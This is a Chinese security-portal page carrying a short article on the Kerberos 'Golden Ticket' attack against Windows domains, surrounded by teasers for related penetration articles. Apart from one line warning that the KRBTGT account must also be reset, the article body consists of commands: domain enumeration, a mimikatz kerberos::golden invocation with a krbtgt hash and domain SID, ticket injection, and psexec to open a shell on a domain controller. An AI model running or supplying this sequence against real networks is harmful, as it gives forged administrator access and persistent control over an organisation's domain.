51CTO首页
AI.x社区
博客
学堂
精品班
软考社区
免费课
企业培训
鸿蒙开发者社区
WOT技术大会
IT证书
公众号矩阵
移动端
短视频免费课程课程排行直播课软考学堂
全部课程厂商认证IT技术24年11月软考PMP项目管理免费题库
在线学习
文章资源问答课堂专栏直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO软考
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
51CTO软考题库
账号设置 退出

域渗透的金之钥匙

作者:mickey
安全 网站安全
如果域控被入侵,仅仅重置域管理员账号,不重置KRBTGT账号,等于是给黑客留了一个后门。
C:\Users\hydra>net group "domain admins" /domain
C:\Users\hydra>whoami /user

mimikatz # kerberos::purge
mimikatz # kerberos::golden /admin:Administrator /domain:pentstlab.com /sid:S-1-5-21-3883552807-251258116-2724407435 /krbtgt:6a8e501fabcf264c70ef3316c6aab7dc /ticket:Administrator.kiribi
mimikatz # kerberos::ptt Administrator.kiribi
mimikatz # kerberos::tgt
E:\>net use \\WIN-0DKN2AS0T2G\c$
E:\>psexec.exe \\WIN-0DKN2AS0T2G cmd
责任编辑:蓝雨泪 来源: 乌云知识库
渗透域渗透内网渗透
相关推荐
内网渗透内信息收集
当获取了一台在域内的Windows服务器权限,就需要我们尽可能地去收集所能获取到的域的相关信息,收集的域的信息越多,拿下域控的成功率越高。

2021-10-11 10:39:13

内网信息收集
渗透——Hook PasswordChangeNotify
在之前的文章中介绍了两种维持域控权限的方法——SSP和SkeletonKey,这两种方法均需要借助Mimikatz来实现,或多或少存在一些不足,所以这次接着介绍一个更加隐蔽且不需要使用Mimikatz的后门方法——HookPasswordChangeNotify.

2016-03-22 10:14:25

域渗透渗透测试域控权限
渗透——DNS记录获取
在域渗透中,对域环境的信息搜集很关键,如果我们获得了域内管理员的权限,那么如何能够快速了解域内的网络架构呢DNS记录无疑是一个很好的参考。

2019-03-29 09:39:24

域渗透DNSWindows
渗透之流量劫持
windowsDomain中文翻译为域,域既是Windows网络操作系统的逻辑组织单元,也是Internet的逻辑组织单元。它是由所有的用户计算机,打印机,用户账户和其他的安全主体组成,被域控制器管理。

2016-12-13 08:45:48

渗透——使用MachineAccount实现DCSync
本文介绍了通过域控制器的计算机帐户口令hash实现DCSync的方法,分析利用思路,给出防御建议。

2020-09-28 10:03:36

渗透
步步深入 内网渗透沦陷过程
前几天拿到一个站的shell,windows2000系统,提权成功,3389没开,打开3389,待服务器重启之后,lcx转发,3389登陆。

2012-11-29 16:11:06

渗透技巧SSH篇
本文分享了有关SSH的渗透小技巧。

2014-06-09 14:18:24

从哲学角度看渗透关于渗透与高智商电影
如何从高智商电影或者书籍之中寻找渗透的灵感,可能会有人问,高智商电影跟渗透入侵有什么关系,在笔者看来,这之间没有直接的的关系,但是有间接的关系……

2013-08-21 16:15:15

渗透笔记脚本入侵(ASP、PHP)
建立一个有一个A字段的表表名为a字段类型为字符长度为50,在表A的a字段插入密码为90sec的一句话木马,把表a的内容导出为物理路径的一个EXCEL文件,导出为EXCEL后在利用IIS解析漏洞就可以变成小马了。

2012-11-28 17:51:50

物联网渗透“私闯民宅”高端操作
任何一个具备高级功能的联网设备都能大大提高我们生活的便利性。从安全厂商的角度来看,对物联网安全的研究也永无止尽。我们不断开展实验,致力于揭示各个物联网设备的脆弱性。

2018-04-04 14:44:08

黑客渗透前奏,信息收集域名采集
在渗透测试的过程中进行信息收集是必不可少的一个流程,而信息收集中的对域名信息采集的详细程度也决定着渗透成功的与否。

2020-04-02 11:11:27

黑客网络安全域名采集
BGP协议VPN组建
作为ASBR的PE之间通过多个子接口相连,两个PE都把对方作为自己的CE设备对待,使用传统的EBGP方式向对端发布IPv4路由。报文在AS内部作为VPN报文,采用两层标签转发方式;在ASBR之间则采用普通IP转发方式。

2013-07-11 10:08:05

Web前端“神秘”方式
JavaScript出于安全方面的考虑,不允许跨域调用其他页面的对象。那什么是跨域呢,简单地理解就是因为JavaScript同源策略的限制,a.com域名下的js无法操作b.com或是c.a.com域名下的对象。

2018-11-26 14:52:12

Web前端跨域
火墙及防火墙渗透被屏蔽子网
我们今天主要向大家讲述的是防火墙及防火墙的渗透之被屏蔽子网,以及对其几种形式的描述,以下就是文章的主要内容的详细描述。

2010-09-09 17:56:29

大咖们青葱岁月吉光
1999年,刘强东还在卖碟,他们在干什么?岁末年初,又到了各种年会各种总结盘点的时刻。我们接下来将推出重磅策划“大咖们的青葱岁月”,访谈圈内IT大咖,看看他们青葱岁月如何走过。第一期,我们访谈了创美工艺工场长金吉光,让我们来看看他是如何一步步奋斗进取,取得事业的成就。

2016-03-18 15:09:37

内网渗透思路探索新思路探索与验证
在渗透过程中经常遇到一种内网结构,由数台mac,linux和windows个人机组成的混合内网,一种扁平化结构。这种扁平化的网络难以管理和维护。并且给安全测试人员带来了困扰。渗透这些网络,就不能使用传统域渗透思路,进入域,获取域管理员权限,控制域控。

2016-05-31 10:11:51

理解深度学习钥匙–参数篇
这是你所有看到的有关神经网络参数的理解中最通俗易懂的一个了,公式也减到了最少,神经网络的专业人士绕道哦。

2017-04-19 09:15:57

深度学习
理解深度学习钥匙 –启蒙篇
由于理解深度学习的前提是理解神经网络,因此,笔者会试着写三篇文章,分别是启蒙篇,参数篇及总结篇,深入浅出的给出我的理解,所有的资料都来自网上电子书《NeuralNetworksandDeepLearning》,这本书写得实在太好了,我只是剪辑了下,吸出了其中的精髓,希望你坚持看完。

2017-04-13 17:20:21

深度学习神经网络
Web安全渗透测试信息搜集篇(上)
当我们进行安全渗透测试的时候,首先要做的就是尽可能多地收集目标应用程序信息,所以,信息搜集是渗透测试一个必不可少的步骤。

2009-08-17 14:47:31

点赞
收藏

51CTO技术栈公众号

业务
速览
在线客服